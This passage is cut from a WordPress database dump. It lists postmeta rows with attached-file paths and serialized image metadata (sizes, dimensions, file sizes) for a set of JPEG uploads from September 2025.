\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93082;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546057733_1370770235048862_2315989396339135817_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:263042;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546057733_1370770235048862_2315989396339135817_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21779;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5604,2004,'_wp_attached_file','2025/09/545515631_1370766771715875_2101698765087175476_n.jpg'),
(5605,2004,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545515631_1370766771715875_2101698765087175476_n.jpg\";s:8:\"filesize\";i:1675802;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545515631_1370766771715875_2101698765087175476_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17478;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545515631_1370766771715875_2101698765087175476_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126728;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545515631_1370766771715875_2101698765087175476_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7781;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545515631_1370766771715875_2101698765087175476_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78565;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545515631_1370766771715875_2101698765087175476_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:232766;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545515631_1370766771715875_2101698765087175476_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5606,2005,'_wp_attached_file','2025/09/545508425_1370769281715624_2525098912561904063_n.jpg'),
(5607,2005,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545508425_1370769281715624_2525098912561904063_n.jpg\";s:8:\"filesize\";i:1739483;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545508425_1370769281715624_2525098912561904063_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18797;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545508425_1370769281715624_2525098912561904063_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137007;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545508425_1370769281715624_2525098912561904063_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8340;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545508425_1370769281715624_2525098912561904063_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85515;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545508425_1370769281715624_2525098912561904063_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249949;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545508425_1370769281715624_2525098912561904063_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5608,2006,'_wp_attached_file','2025/09/546710429_1370769548382264_6907031697176291305_n.jpg'),
(5609,2006,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546710429_1370769548382264_6907031697176291305_n.jpg\";s:8:\"filesize\";i:1571687;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546710429_1370769548382264_6907031697176291305_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19796;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546710429_1370769548382264_6907031697176291305_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130042;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546710429_1370769548382264_6907031697176291305_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8678;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546710429_1370769548382264_6907031697176291305_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546710429_1370769548382264_6907031697176291305_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230841;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546710429_1370769548382264_6907031697176291305_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21280;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5610,2007,'_wp_attached_file','2025/09/545137491_1370769421715610_5706139419919357224_n.jpg'),
(5611,2007,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545137491_1370769421715610_5706139419919357224_n.jpg\";s:8:\"filesize\";i:1605847;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545137491_1370769421715610_5706139419919357224_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18049;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545137491_1370769421715610_5706139419919357224_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130874;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545137491_1370769421715610_5706139419919357224_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8454;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545137491_1370769421715610_5706139419919357224_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82357;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545137491_1370769421715610_5706139419919357224_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:236698;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545137491_1370769421715610_5706139419919357224_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19820;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5612,2008,'_wp_attached_file','2025/09/546070446_1370769055048980_8142323871884316008_n.jpg'),
(5613,2008,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546070446_1370769055048980_8142323871884316008_n.jpg\";s:8:\"filesize\";i:1896482;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546070446_1370769055048980_8142323871884316008_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15336;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546070446_1370769055048980_8142323871884316008_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126978;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546070446_1370769055048980_8142323871884316008_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7061;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546070446_1370769055048980_8142323871884316008_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74718;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546070446_1370769055048980_8142323871884316008_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246679;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546070446_1370769055048980_8142323871884316008_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16938;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5614,2009,'_wp_attached_file','2025/09/546462779_1370768925048993_7895970185212061007_n.jpg'),
(5615,2009,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546462779_1370768925048993_7895970185212061007_n.jpg\";s:8:\"filesize\";i:1873817;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546462779_1370768925048993_7895970185212061007_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15444;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546462779_1370768925048993_7895970185212061007_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126733;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546462779_1370768925048993_7895970185212061007_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6890;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546462779_1370768925048993_7895970185212061007_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74737;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546462779_1370768925048993_7895970185212061007_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245050;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546462779_1370768925048993_7895970185212061007_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17424;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5616,2010,'_wp_attached_file','2025/09/544909618_1370768151715737_1378513358628300785_n.jpg'),
(5617,2010,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/544909618_1370768151715737_1378513358628300785_n.jpg\";s:8:\"filesize\";i:1596552;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"544909618_1370768151715737_1378513358628300785_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17224;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"544909618_1370768151715737_1378513358628300785_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115065;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"544909618_1370768151715737_1378513358628300785_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7824;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"544909618_1370768151715737_1378513358628300785_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71985;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"544909618_1370768151715737_1378513358628300785_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212384;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"544909618_1370768151715737_1378513358628300785_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18492;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5618,2011,'_wp_attached_file','2025/09/546292379_1370767351715817_3174345509212405828_n.jpg'),
(5619,2011,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546292379_1370767351715817_3174345509212405828_n.jpg\";s:8:\"filesize\";i:1302995;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546292379_1370767351715817_3174345509212405828_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15475;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546292379_1370767351715817_3174345509212405828_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95470;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546292379_1370767351715817_3174345509212405828_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7088;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546292379_1370767351715817_3174345509212405828_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61708;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546292379_1370767351715817_3174345509212405828_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170102;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546292379_1370767351715817_3174345509212405828_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16557;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5620,2012,'_wp_attached_file','2025/09/547183079_1370759228383296_6433183860505725960_n.jpg'),
(5621,2012,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/547183079_1370759228383296_6433183860505725960_n.jpg\";s:8:\"filesize\";i:1813910;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"547183079_1370759228383296_6433183860505725960_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19183;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"547183079_1370759228383296_6433183860505725960_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141750;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"547183079_1370759228383296_6433183860505725960_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8469;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"547183079_1370759228383296_6433183860505725960_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89097;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"547183079_1370759228383296_6433183860505725960_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:255908;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"547183079_1370759228383296_6433183860505725960_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20934;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5622,2013,'_wp_attached_file','2025/09/545696609_1370758981716654_8478641995253835673_n.jpg'),
(5623,2013,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545696609_1370758981716654_8478641995253835673_n.jpg\";s:8:\"filesize\";i:1564214;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545696609_1370758981716654_8478641995253835673_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18384;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545696609_1370758981716654_8478641995253835673_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117384;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545696609_1370758981716654_8478641995253835673_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8436;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545696609_1370758981716654_8478641995253835673_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75546;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545696609_1370758981716654_8478641995253835673_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209124;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545696609_1370758981716654_8478641995253835673_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18706;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5624,2014,'_wp_attached_file','2025/09/545612451_1370759071716645_3274378198375273117_n.jpg'),
(5625,2014,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545612451_1370759071716645_3274378198375273117_n.jpg\";s:8:\"filesize\";i:1698694;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545612451_1370759071716645_3274378198375273117_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20300;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545612451_1370759071716645_3274378198375273117_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137228;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545612451_1370759071716645_3274378198375273117_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9048;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545612451_1370759071716645_3274378198375273117_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87989;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545612451_1370759071716645_3274378198375273117_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245780;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545612451_1370759071716645_3274378198375273117_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21048;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5626,2015,'_wp_attached_file','2025/09/545362183_1370758961716656_9072266310043210898_n.jpg'),
(5627,2015,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545362183_1370758961716656_9072266310043210898_n.jpg\";s:8:\"filesize\";i:1379587;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545362183_1370758961716656_9072266310043210898_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15384;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545362183_1370758961716656_9072266310043210898_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106407;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545362183_1370758961716656_9072266310043210898_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7818;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545362183_1370758961716656_9072266310043210898_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67494;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545362183_1370758961716656_9072266310043210898_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191298;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545362183_1370758961716656_9072266310043210898_